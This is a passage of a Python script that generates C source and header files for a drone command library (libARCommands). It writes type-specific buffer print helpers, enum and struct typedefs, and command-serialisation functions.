cfile.write (' const char *buffAddr = (char *)&buffer[*offset];\n')
cfile.write (' int newOffset = *offset;\n')
cfile.write (' while ((newOffset < capacity) && (\'\\0\' != (char) buffer [newOffset]))\n')
cfile.write (' {\n')
cfile.write (' newOffset += sizeof (char);\n');
cfile.write (' }\n')
cfile.write (' if (newOffset >= capacity)\n')
cfile.write (' {\n')
cfile.write (' *error = 1;\n');
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = buffAddr;\n')
cfile.write (' *offset = newOffset + 1;\n')
cfile.write (' *error = 0;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('// -------- //\n')
cfile.write ('// TOSTRING //\n')
cfile.write ('// -------- //\n')
cfile.write ('\n')
if (hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8] or
hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16] or
hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or
hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64] or
hasArgOfType[ArArgType.FLOAT] or hasArgOfType[ArArgType.DOUBLE] or
hasArgOfType[ArArgType.STRING] or hasArgOfType[ArArgType.ENUM]):
cfile.write ('// Write a string in a buffer\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (const char *stringToWrite, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int retVal = -1;\n')
cfile.write (' int capacity = outputLen - outputOffset - 1;\n')
cfile.write (' int len = strlen (stringToWrite);\n')
cfile.write (' if (capacity >= len)\n')
cfile.write (' {\n')
cfile.write (' strncat (output, stringToWrite, len);\n')
cfile.write (' retVal = outputOffset + len;\n')
cfile.write (' } // No else --> If capacity is not enough, keep retVal to -1\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U8]:
cfile.write ('// Write a string in a buffer from an uint8_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU8') + ' (const char *name, uint8_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = -1;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRIU8\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIu8, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%u", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.I8]:
cfile.write ('// Write a string in a buffer from an int8_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI8') + ' (const char *name, int8_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = -1;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRII8\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIi8, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%d", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U16]:
cfile.write ('// Write a string in a buffer from an uint16_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU16') + ' (const char *name, uint16_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = -1;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRIU16\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIu16, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%u", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.I16]:
cfile.write ('// Write a string in a buffer from an int16_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI16') + ' (const char *name, int16_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRII16\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIi16, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%d", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U32]:
cfile.write ('// Write a string in a buffer from an uint32_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU32') + ' (const char *name, uint32_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRIU32\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIu32, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%u", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.ENUM]:
cfile.write ('// Write a string in a buffer from an int32_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI32') + ' (const char *name, int32_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRII32\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIi32, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%d", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U64]:
cfile.write ('// Write a string in a buffer from an uint64_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU64') + ' (const char *name, uint64_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRIU64\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIu64, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%llu", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.I64]:
cfile.write ('// Write a string in a buffer from an int64_t arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI64') + ' (const char *name, int64_t arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write ('#if HAVE_DECL_PRII64\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIi64, arg);\n')
cfile.write ('#else\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%lld", arg);\n')
cfile.write ('#endif\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.FLOAT]:
cfile.write ('// Write a string in a buffer from float arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintFloat') + ' (const char *name, float arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%f", arg);\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.DOUBLE]:
cfile.write ('// Write a string in a buffer from a double arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintDouble') + ' (const char *name, double arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int capacity, len;\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' int retVal = offset;\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' capacity = outputLen - offset - 1;\n')
cfile.write (' len = snprintf (& output [offset], capacity, "%f", arg);\n')
cfile.write (' if (len >= capacity)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = offset + len;\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.STRING]:
cfile.write ('// Write a string in a buffer from a string arg\n')
cfile.write ('// On error, return -1, else return offset in string\n')
cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintString') + ' (const char *name, const char *arg, char *output, int outputLen, int outputOffset)\n')
cfile.write ('{\n')
cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n')
cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n')
cfile.write (' if (offset >= 0)\n')
cfile.write (' {\n')
cfile.write (' offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (arg, output, outputLen, offset);\n')
cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n')
cfile.write (' return offset;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.close ()
#################################
# 4TH PART : #
#################################
# Generate public Types H file #
#################################
hfile = open (paths.COMMANDSTYPES_HFILE, 'w')
hfile.write ('// ARSDK_NO_ENUM_PREPROCESS //')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @file ' + COMMANDSTYPES_HFILE_NAME + '\n')
hfile.write (' * @brief libARCommands types header.\n')
hfile.write (' * This file contains all types declarations needed to use commands\n')
hfile.write (' * @note Autogenerated file\n')
hfile.write (' **/\n')
hfile.write ('#ifndef ' + COMMANDSTYPES_DEFINE + '\n')
hfile.write ('#define ' + COMMANDSTYPES_DEFINE + '\n')
hfile.write ('#include <inttypes.h>\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Size of the ARCommands header.\n')
hfile.write (' * This is the minimum size of a zero-arg command.\n')
hfile.write (' * The size of a command is equal to this, plus the size\n')
hfile.write (' * of its arguments.\n')
hfile.write (' */\n')
hfile.write ('#define ' + ARMacroName (LIB_MODULE, 'HEADER', 'SIZE') + ' (4)\n')
hfile.write ('\n')
if genDebug:
hfile.write ('/**\n')
hfile.write (' * Defined only if the library includes debug commands\n')
hfile.write (' */\n')
hfile.write ('#define ' + ARMacroName (LIB_MODULE, 'HAS', 'DEBUG_COMMANDS') + ' (1)\n')
hfile.write ('\n')
for ftr in allFeatures:
hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n')
for enum in ftr.enums:
submodules=get_ftr_old_name(ftr).upper()
macro_name=enum.name.upper();
hfile.write ('\n/**\n')
hfile.write (' * @brief ' + enum.doc.replace('\n', '\\n') + '\n')
hfile.write (' */\n')
hfile.write ('typedef enum\n')
hfile.write ('{\n')
first = True
for eVal in enum.values:
hfile.write (' ' + AREnumValue (LIB_MODULE, submodules, macro_name, eVal.name))
if eVal.value:
hfile.write (' = ' + str(eVal.value))
elif first:
hfile.write (' = 0')
hfile.write (', ///< ' + eVal.doc.replace('\n', '\\n') + '\n')
first = False
hfile.write (' ' + AREnumValue (LIB_MODULE, submodules, macro_name, 'MAX') + '\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, submodules, macro_name) + ';\n\n')
#If the enum is used as bit field
if enum.usedLikeBitfield:
#Generate bit field flags
for eVal in enum.values:
hfile.write ('#define ' + ARFlagValue (LIB_MODULE, submodules, macro_name, eVal.name) + ' (1 << '+AREnumValue (LIB_MODULE, submodules, macro_name, eVal.name)+ ') ///< ' + eVal.doc.replace('\n', '\\n') + '\n')
hfile.write ('\n')
for ftr in allFeatures:
hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n')
for multiset in ftr.multisets:
submodules=get_ftr_old_name(ftr)
hfile.write ('\n/**\n')
hfile.write (' * @brief ' + multiset.doc.replace('\n', '\\n') + '\n')
hfile.write (' */\n')
hfile.write ('typedef struct\n')
hfile.write ('{\n')
for msg in multiset.msgs:
hfile.write (' struct\n')
hfile.write (' {\n')
hfile.write (' uint8_t isSet;\n')
for arg in msg.args:
hfile.write (' '+xmlToC (LIB_MODULE, msg.ftr, msg, arg) +' '+arg.name+';\n')
hfile.write (' } '+msg.name+';\n')
hfile.write ('\n')
hfile.write ('} ' + ARTypeName (LIB_MODULE, submodules, multiset.name) + ';\n\n')
hfile.write ('\n')
hfile.write ('#endif /* ' + COMMANDSTYPES_DEFINE + ' */\n')
hfile.close ()
#################################
# 5TH PART : #
#################################
# Generate public coder H file #
#################################
hfile = open (paths.COMMANDSGEN_HFILE, 'w')
hfile.write (LICENCE_HEADER)
hfile.write ('/**\n')
hfile.write (' * @file ' + COMMANDSGEN_HFILE_NAME + '\n')
hfile.write (' * @brief libARCommands generator header.\n')
hfile.write (' * This file contains all declarations needed to generate commands\n')
hfile.write (' * @note Autogenerated file\n')
hfile.write (' **/\n')
hfile.write ('#ifndef ' + COMMANDSGEN_DEFINE + '\n')
hfile.write ('#define ' + COMMANDSGEN_DEFINE + '\n')
hfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
hfile.write ('#include <inttypes.h>\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('/**\n')
hfile.write (' * @brief Error codes for ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'GenerateCommand') + ' functions\n')
hfile.write (' */\n')
hfile.write ('typedef enum {\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ' = 0, ///< No error occured\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'BAD_ARGS') + ', ///< At least one of the arguments is invalid\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ', ///< The given output buffer was not large enough for the command\n')
hfile.write (' ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'ERROR') + ', ///< Any other error\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('\n')
for ftr in allFeatures:
hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n\n')
for cmd in ftr.cmds + ftr.evts:
hfile.write ('\n/**\n')
hfile.write (' * @brief ' + cmd.doc.desc.replace('\n', '\n * ') + '\n')
if cmd.isDeprecated:
hfile.write (' * @deprecated\n')
hfile.write (' * @warning A command is not NULL terminated and can contain NULL bytes.\n')
hfile.write (' * @param buffer Pointer to the buffer in which the library should store the command\n')
hfile.write (' * @param buffLen Size of the buffer\n')
hfile.write (' * @param cmdLen Pointer to an integer that will hold the actual size of the command\n')
for arg in cmd.args:
hfile.write (' * @param _' + arg.name + ' ' + get_arg_doc(arg).replace('\n', '\\n') + '\n')
#If the argument is a bitfield
if isinstance(arg.argType, ArBitfield):
hfile.write (' * @param _' + arg.name + ' a combination of')
#Find the feature owning the enum
for bitFieldFtr in allFeatures:
for enum2 in bitFieldFtr.enums:
if enum2 == arg.argType.enum:
break;
else:
continue
break
for eVal in arg.argType.enum.values:
hfile.write (' ; ' + ARFlagValue(LIB_MODULE, bitFieldFtr.name , arg.argType.enum.name, eVal.name))
hfile.write ('\n')
hfile.write (' * @return Error code (see ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ')\n')
hfile.write (' */\n')
hfile.write (AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd))) + ' (uint8_t *buffer, int32_t buffLen, int32_t *cmdLen')
for arg in cmd.args:
hfile.write (', ' + xmlToCwithConst (LIB_MODULE, ftr, cmd, arg, True) + ' _' + arg.name)
hfile.write (');\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('#endif /* ' + COMMANDSGEN_DEFINE + ' */\n')
hfile.close ()
#################################
# 6TH PART : #
#################################
# Generate coder C part #
#################################
cfile = open (paths.COMMANDSGEN_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <config.h>\n')
cfile.write ('#include "' + COMMANDSRW_HFILE_NAME + '"\n')
cfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSGEN_HFILE_NAME + '>\n')
cfile.write ('#include <' + COMMANDSID_HFILE_NAME + '>\n')
cfile.write ('\n')
for ftr in allFeatures:
cfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n\n')
for cmd in ftr.cmds + ftr.evts:
cfile.write (AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd))) + ' (uint8_t *buffer, int32_t buffLen, int32_t *cmdLen')
for arg in cmd.args:
cfile.write (', ' + xmlToCwithConst (LIB_MODULE, ftr, cmd, arg, True) + ' _' + arg.name)
cfile.write (')\n')
cfile.write ('{\n')
cfile.write (' int32_t currIndexInBuffer = 0;\n')
if [arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)]:
cfile.write (' int32_t currFreeSizeInBuffer = 0;\n')
cfile.write (' int32_t multisetSize = 0;\n')
cfile.write (' int32_t multisetSizeIndex = 0;\n')
cfile.write (' int32_t cmdSize = 0;\n')
cfile.write (' int32_t cmdSizeIndex = 0;\n')
cfile.write (' int32_t cmdIndex = 0;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ';\n')
cfile.write (' if ((buffer == NULL) ||\n')
for arg in cmd.args:
if isinstance(arg.argType, ArMultiSetting):
cfile.write (' (_' + arg.name + ' == NULL) ||\n')
cfile.write (' (cmdLen == NULL))\n')
cfile.write (' {\n')
cfile.write (' return ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'BAD_ARGS') + ';\n')
cfile.write (' } // No else --> Args Check\n')
hasStringArgs = False
for arg in cmd.args:
if arg.argType == ArArgType.STRING:
hasStringArgs = True
break
if hasStringArgs:
cfile.write (' // Test all String args (if any)\n')
cfile.write (' if (')
first = True
for arg in cmd.args:
if ArArgType.STRING == arg.argType:
if first:
first = False
else:
cfile.write (' ')
cfile.write ('(_' + arg.name + ' == NULL) ||\n')
cfile.write (' (0))\n')
cfile.write (' {\n')
cfile.write (' return ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'BAD_ARGS') + ';\n')
cfile.write (' } // No else --> Args Check\n')
cfile.write ('\n')
cfile.write (' // Write feature header\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU8ToBuffer') + ' (buffer, ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ', currIndexInBuffer, buffLen);\n')
cfile.write (' if (currIndexInBuffer == -1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no issue was found\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' // Write class header\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
classIdName = ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS') if cmd.cls is None else AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cmd.cls.name)
cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU8ToBuffer') + ' (buffer, ' + classIdName + ', currIndexInBuffer, buffLen);\n')
cfile.write (' if (currIndexInBuffer == -1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no issue was found\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' // Write id header\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cmdIdName = AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) if cmd.cls is None else AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cmd.cls.name + '_CMD', cmd.name)
cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (buffer, ' + cmdIdName + ', currIndexInBuffer, buffLen);\n')
cfile.write (' if (currIndexInBuffer == -1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if no issue was found\n')
cfile.write (' } // No else --> Processing block\n')
for arg in cmd.args:
if isinstance(arg.argType, ArMultiSetting):
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' multisetSizeIndex = currIndexInBuffer;\n')
cfile.write (' currIndexInBuffer += sizeof(uint16_t);\n')
cfile.write (' }\n')
cfile.write ('\n')
for multiset_msg in arg.argType.msgs:
